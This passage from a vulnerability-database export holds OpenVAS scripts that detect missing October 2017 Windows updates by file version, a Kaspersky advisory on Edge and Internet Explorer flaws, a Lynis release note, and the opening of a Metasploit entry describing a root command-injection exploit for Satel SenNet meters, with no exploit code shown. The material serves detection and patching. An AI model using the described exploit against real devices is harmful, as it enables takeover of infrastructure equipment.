See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811927\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11762\", \"CVE-2017-8694\", \"CVE-2017-8717\", \"CVE-2017-11763\",\n \"CVE-2017-11765\", \"CVE-2017-8718\", \"CVE-2017-8727\", \"CVE-2017-11815\",\n \"CVE-2017-11771\", \"CVE-2017-11772\", \"CVE-2017-11779\", \"CVE-2017-11780\",\n \"CVE-2017-11781\", \"CVE-2017-11784\", \"CVE-2017-11785\", \"CVE-2017-11790\",\n \"CVE-2017-11793\", \"CVE-2017-11810\", \"CVE-2017-11816\", \"CVE-2017-11817\",\n \"CVE-2017-11818\", \"CVE-2017-11824\", \"CVE-2017-11814\", \"CVE-2017-13080\");\n script_bugtraq_id(101108, 101100, 101161, 101109, 101111, 101162, 101142, 101114,\n 101116, 101166, 101110, 101140, 101147, 101149, 101077, 101141,\n 101081, 101094, 101095, 101101, 101099, 101093, 101136, 101274);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 08:59:57 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Windows Server 2012 Multiple Vulnerabilities (KB4041690)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041690\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - A spoofing vulnerability in the Windows implementation of wireless networking (KRACK)\n\n - 
An error in USBHUB.SYS randomly causes memory corruption that results in\n random system crashes that are extremely difficult to diagnose.\n\n - Security updates to Microsoft Windows Search Component, Windows kernel-mode drivers,\n Microsoft Graphics Component, Internet Explorer, Windows kernel, Windows Wireless\n Networking, Windows Storage and File systems, Microsoft Windows DNS, Microsoft JET\n Database Engine, and the Windows SMB Server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the security context of the local system to take\n complete control of an affected system, gain access to potentially sensitive\n information, conduct a denial-of-service condition, bypass certain security\n restrictions and gain elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041690\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"shell32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.2.9200.22281\"))\n{\n report = 'File checked: ' 
+ sysPath + \"\\shell32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.2.9200.22281\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:49", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4041681", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310812016", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812016", "title": "Microsoft Windows Multiple Vulnerabilities (KB4041681)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4041681)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812016\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11762\", \"CVE-2017-8694\", \"CVE-2017-8717\", \"CVE-2017-8718\",\n \"CVE-2017-11763\", \"CVE-2017-11765\", \"CVE-2017-8727\", \"CVE-2017-11771\",\n \"CVE-2017-11772\", \"CVE-2017-11780\", \"CVE-2017-11781\", \"CVE-2017-11784\",\n \"CVE-2017-11785\", \"CVE-2017-11790\", \"CVE-2017-11793\", \"CVE-2017-11810\",\n \"CVE-2017-11813\", \"CVE-2017-11814\", \"CVE-2017-11815\", \"CVE-2017-11816\",\n \"CVE-2017-11817\", \"CVE-2017-11819\", \"CVE-2017-11822\", \"CVE-2017-11824\",\n \"CVE-2017-8689\", \"CVE-2017-13080\");\n script_bugtraq_id(101108, 101100, 101161, 101162, 101109, 101111, 101142, 101114,\n 101116, 101110, 101140, 101147, 101149, 101077, 101141, 101081,\n 101083, 101093, 101136, 101094, 101095, 101121, 101122, 101099,\n 101128, 101274);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 08:41:12 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4041681)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041681\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A spoofing vulnerability in the Windows 
implementation of wireless networking (KRACK)\n\n - An error in the Microsoft Server Block Message (SMB) when an attacker sends\n specially crafted requests to the server.\n\n - An error in the Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space Layout Randomization\n (ASLR) bypass.\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - An error when the Windows font library improperly handles specially crafted\n embedded fonts.\n\n - An error when the Windows kernel-mode driver fails to properly handle objects\n in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the Microsoft JET Database Engine that could allow remote code\n execution on an affected system.\n\n - An error when Internet Explorer improperly handles objects in memory.\n\n - An error when the Windows Graphics Component improperly handles objects in\n memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Internet Explorer.\n\n - An error when Internet Explorer improperly accesses objects in memory via the\n Microsoft Windows Text Services Framework.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error in the way that Microsoft browsers access objects in memory.\n\n - An error when the Windows kernel improperly initializes objects in memory.\n\n - An error in the way that the Windows Graphics Device Interface (GDI) handles\n objects in memory, allowing an attacker to retrieve information from a targeted\n system.\n\n - An error in the way that the Windows SMB Server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, conduct denial-of-service, gain access to potentially\n sensitive information, take control of the affected system and gain escalated\n privileges.\");\n\n script_tag(name:\"affected\", 
value:\"Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041681\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"win32k.sys\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23914\"))\n{\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.1.7601.23914\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4041693", "modified": "2019-05-03T00:00:00", "published": "2017-10-11T00:00:00", "id": "OPENVAS:1361412562310812022", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812022", "title": "Microsoft Windows Multiple Vulnerabilities (KB4041693)", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4041693)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812022\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_cve_id(\"CVE-2017-11762\", \"CVE-2017-8694\", \"CVE-2017-8717\", \"CVE-2017-8718\",\n \"CVE-2017-11763\", \"CVE-2017-11765\", \"CVE-2017-8727\", \"CVE-2017-11771\",\n \"CVE-2017-11772\", \"CVE-2017-11779\", \"CVE-2017-11780\", \"CVE-2017-11781\",\n \"CVE-2017-11783\", \"CVE-2017-11784\", \"CVE-2017-11785\", \"CVE-2017-11790\",\n \"CVE-2017-11793\", \"CVE-2017-11810\", \"CVE-2017-11813\", \"CVE-2017-11814\",\n \"CVE-2017-11815\", \"CVE-2017-11816\", \"CVE-2017-11817\", \"CVE-2017-11818\",\n \"CVE-2017-11822\", \"CVE-2017-11824\", \"CVE-2017-8689\", \"CVE-2017-13080\");\n script_bugtraq_id(101108, 101100, 101161, 101162, 101109, 101111, 101142, 101114,\n 101116, 101166, 101110, 101140, 101144, 101147, 101149, 101077,\n 101141, 101081, 101083, 101093, 101136, 101094, 101095, 101101,\n 101122, 101099, 
101128, 101274);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 09:41:11 +0530 (Wed, 11 Oct 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4041693)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4041693\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A spoofing vulnerability in the Windows implementation of wireless networking (KRACK)\n\n - An error when Windows improperly handles calls to Advanced Local Procedure\n Call (ALPC).\n\n - An error in the Microsoft Server Block Message (SMB) when an attacker sends\n specially crafted requests to the server.\n\n - An error in the Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space Layout Randomization\n (ASLR) bypass.\n\n - An error in certain Trusted Platform Module (TPM) chipsets.\n\n - An error when the Windows kernel improperly handles objects in memory.\n\n - An error when the Windows font library improperly handles specially crafted\n embedded fonts.\n\n - An error when the Windows kernel-mode driver fails to properly handle objects\n in memory.\n\n - An error when Internet Explorer improperly accesses objects in memory.\n\n - An error in the Microsoft JET Database Engine that could allow remote code\n execution on an affected system.\n\n - An error when the Windows Graphics Component improperly handles objects in\n memory.\n\n - An error in the way that the scripting engine handles objects in memory in\n Internet Explorer.\n\n - An error when Internet Explorer improperly accesses objects 
in memory via\n the Microsoft Windows Text Services Framework.\n\n - An error in Windows Domain Name System (DNS) DNSAPI.\n\n - An error when Windows Search improperly handles objects in memory.\n\n - An error when Windows Search handles objects in memory.\n\n - An error in Microsoft Windows storage when it fails to validate an\n integrity-level check.\n\n - An error in the way that the Windows Graphics Device Interface (GDI) handles\n objects in memory, allowing an attacker to retrieve information from a targeted\n system.\n\n - An error in the way that the Windows SMB Server handles certain requests.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n who successfully exploited this vulnerability to run arbitrary code in the\n security context of the local system, cause the affected system to crash, gain\n access to potentially sensitive information, take control of an affected system\n and gain the same user rights as the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8.1 for 32-bit/x64\n\n Microsoft Windows Server 2012 R2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4041693\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"gdi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.3.9600.18818\"))\n{\n report = 'File checked: ' + sysPath + \"\\gdi32.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: Less than 6.3.9600.18818\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:30", "bulletinFamily": "info", "description": "### *Detect date*:\n10/10/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Microsoft Internet Explorer. 
Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Edge \nMicrosoft Internet Explorer versions 9 through 11\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-11790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11790>) \n[CVE-2017-11792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11792>) \n[CVE-2017-11793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11793>) \n[CVE-2017-11794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11794>) \n[CVE-2017-11796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11796>) \n[CVE-2017-11798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11798>) \n[CVE-2017-11813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11813>) \n[CVE-2017-11812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11812>) \n[CVE-2017-11811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11811>) \n[CVE-2017-11810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810>) \n[CVE-2017-11810](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810>) \n[CVE-2017-11811](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11811>) \n[CVE-2017-11812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11812>) \n[CVE-2017-11813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11813>) \n[CVE-2017-11790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11790>) 
\n[CVE-2017-11792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11792>) \n[CVE-2017-11793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11793>) \n[CVE-2017-11794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11794>) \n[CVE-2017-11796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11796>) \n[CVE-2017-11798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11798>) \n[CVE-2017-11800](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11800>) \n[CVE-2017-11805](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11805>) \n[CVE-2017-11808](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11808>) \n[CVE-2017-11804](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11804>) \n[CVE-2017-11809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11809>) \n[CVE-2017-11799](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11799>) \n[CVE-2017-11822](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11822>) \n[CVE-2017-11806](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11806>) \n[CVE-2017-11802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11802>) \n[CVE-2017-11807](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11807>) \n[CVE-2017-8726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8726>) \n[CVE-2017-11821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11821>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### 
*CVE-IDS*:\n[CVE-2017-11810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11810>)7.6Critical \n[CVE-2017-11811](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11811>)7.5Critical \n[CVE-2017-11812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11812>)7.5Critical \n[CVE-2017-11813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11813>)7.6Critical \n[CVE-2017-11790](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11790>)4.3Critical \n[CVE-2017-11792](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11792>)7.5Critical \n[CVE-2017-11793](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11793>)7.6Critical \n[CVE-2017-11794](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11794>)4.3Critical \n[CVE-2017-11796](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11796>)7.5Critical \n[CVE-2017-11798](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11798>)7.6Critical \n[CVE-2017-11800](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11800>)7.6Critical \n[CVE-2017-11805](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11805>)7.5Critical \n[CVE-2017-11808](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11808>)7.5Critical \n[CVE-2017-11804](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11804>)7.5Critical \n[CVE-2017-11809](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11809>)7.5Critical \n[CVE-2017-11799](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11799>)7.5Critical \n[CVE-2017-11822](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11822>)7.6Critical \n[CVE-2017-11806](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11806>)7.5Critical \n[CVE-2017-11802](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11802>)7.5Critical \n[CVE-2017-11807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11807>)7.5Critical 
\n[CVE-2017-8726](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8726>)4.3Critical \n[CVE-2017-11821](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11821>)7.5Critical\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4041689](<http://support.microsoft.com/kb/4041689>) \n[4041693](<http://support.microsoft.com/kb/4041693>) \n[4041676](<http://support.microsoft.com/kb/4041676>) \n[4041690](<http://support.microsoft.com/kb/4041690>) \n[4041681](<http://support.microsoft.com/kb/4041681>) \n[4041691](<http://support.microsoft.com/kb/4041691>) \n[4042895](<http://support.microsoft.com/kb/4042895>) \n[4040685](<http://support.microsoft.com/kb/4040685>)", "modified": "2019-03-07T00:00:00", "published": "2017-10-10T00:00:00", "id": "KLA11112", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11112", "title": "\r KLA11112Multiple vulnerabilities in Microsoft Edge and Microsoft Internet Explorer ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2019-10-18T12:34:09", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-p2rdZ63sxRU/VbBxt5iYZuI/AAAAAAAAEac/8yjkIc_IDdU/s1600/lynis2.1.1.png>)\n\n \n\n\nWe are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next in a series of simplification improvements we have made. There is a risk of breaking your existing configuration. \n \nLynis is an open source security auditing tool. It is used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners. 
\n\n \n\n\n** Supported operating systems **\n\n \n\n\nThe tool has almost no dependencies, so it runs on almost all Unix-based systems and versions, including: \n\n * AIX \n * FreeBSD \n * HP-UX \n * Linux \n * Mac OS \n * NetBSD \n * OpenBSD \n * Solaris \n * and others \n\nIt even runs on systems like the Raspberry Pi and several storage devices! \n \n\n\n** Installation optional ** \n \nLynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use \"./lynis audit system\" to start the security scan. It is written in shell script and released as open source software ( GPL ). \n\n \n\n\n** How it works **\n\n \n\n\nLynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of performing a set of steps, from initializing the program up to producing the report. \n\n \n\n\n** Steps **\n\n 1. Determine operating system \n 2. Search for available tools and utilities \n 3. Check for Lynis update \n 4. Run tests from enabled plugins \n 5. Run security tests per category \n 6. Report status of security scan \n\nBesides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file. \n\n \n\n\n** Opportunistic scanning **\n\n \n\n\nLynis scanning is opportunistic: it uses what it can find. \n\nFor example, if it sees you are running Apache, it will perform an initial round of Apache-related tests. When, during the Apache scan, it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it will then collect discovered certificates, so they can be scanned later as well. \n\n \n\n\n** In-depth security scans **\n\n \n\n\nBy performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. 
In other words, Lynis will always perform scans which are customized to your system. No audit will be the same! \n\n \n\n\n** Use cases **\n\n \n\n\nSince Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include: \n\n * Security auditing \n * Compliance testing (e.g. PCI, HIPAA, SOx) \n * Vulnerability detection and scanning \n * System hardening \n\n \n\n\n** Resources used for testing **\n\n \n\n\nMany other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool. \n\n * Best practices \n * CIS \n * NIST \n * NSA \n * OpenSCAP data \n * Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat) \n\n \n\n\n** Lynis Plugins ** \n \nPlugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard. \n \n** Changelog **\n\nUpgrade note \n\n \n \n During the development of this release, the project was informed of a flaw\n that could possibly be abused by a local attacker. Even with the small risk of\n success, upgrading is highly recommended. 
See details on\n [CVE-2017-8108](https://cisofy.com/security/cve/cve-2017-8108/)\n \n This release is a special maintenance release with focus on cleaning up the code\n for readability and future expansion.\n \n Changes:\n --------\n * Use ROOTDIR variable instead of fixed paths\n * Introduction of IsEmpty and HasData functions for readability of code\n * Renamed some variables to better indicate their purpose (counting, data type)\n * Removal of unused code and comments\n * Deleted unused tests from database file\n * Correct levels of indentation\n * Support for older mac OS X versions (Lion and Mountain Lion)\n * Initialized variables for more binaries\n * Additional sysctls are tested\n \n Tests:\n ------\n * MALW-3280 - Extended test with Symantec components\n * PKGS-7332 - Detection of macOS ports tool and installed packages\n * TOOL-5120 - Snort detection\n * TOOL-5122 - Snort configuration file\n\n \n \n\n\n** [ Download Lynis 2.5.0 ](<https://cisofy.com/download/lynis/>) **\n *[\n GPL\n ]: GNU Public License\n", "modified": "2017-05-05T14:35:12", "published": "2017-05-05T14:35:12", "id": "KITPLOIT:8819491108895473634", "href": "http://www.kitploit.com/2017/05/lynis-250-security-auditing-tool-for.html", "title": "Lynis 2.5.0 - Security Auditing Tool for Unix/Linux Systems", "type": "kitploit", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-11-22T20:27:55", "bulletinFamily": "exploit", "description": "This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters to perform arbitrary command execution as 'root'.\n", "modified": "2017-07-24T13:26:21", "published": "2017-04-06T20:52:11", "id": "MSF:AUXILIARY/SCANNER/TELNET/SATEL_CMD_EXEC", "href": "", "type": "metasploit", "title": "Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# 
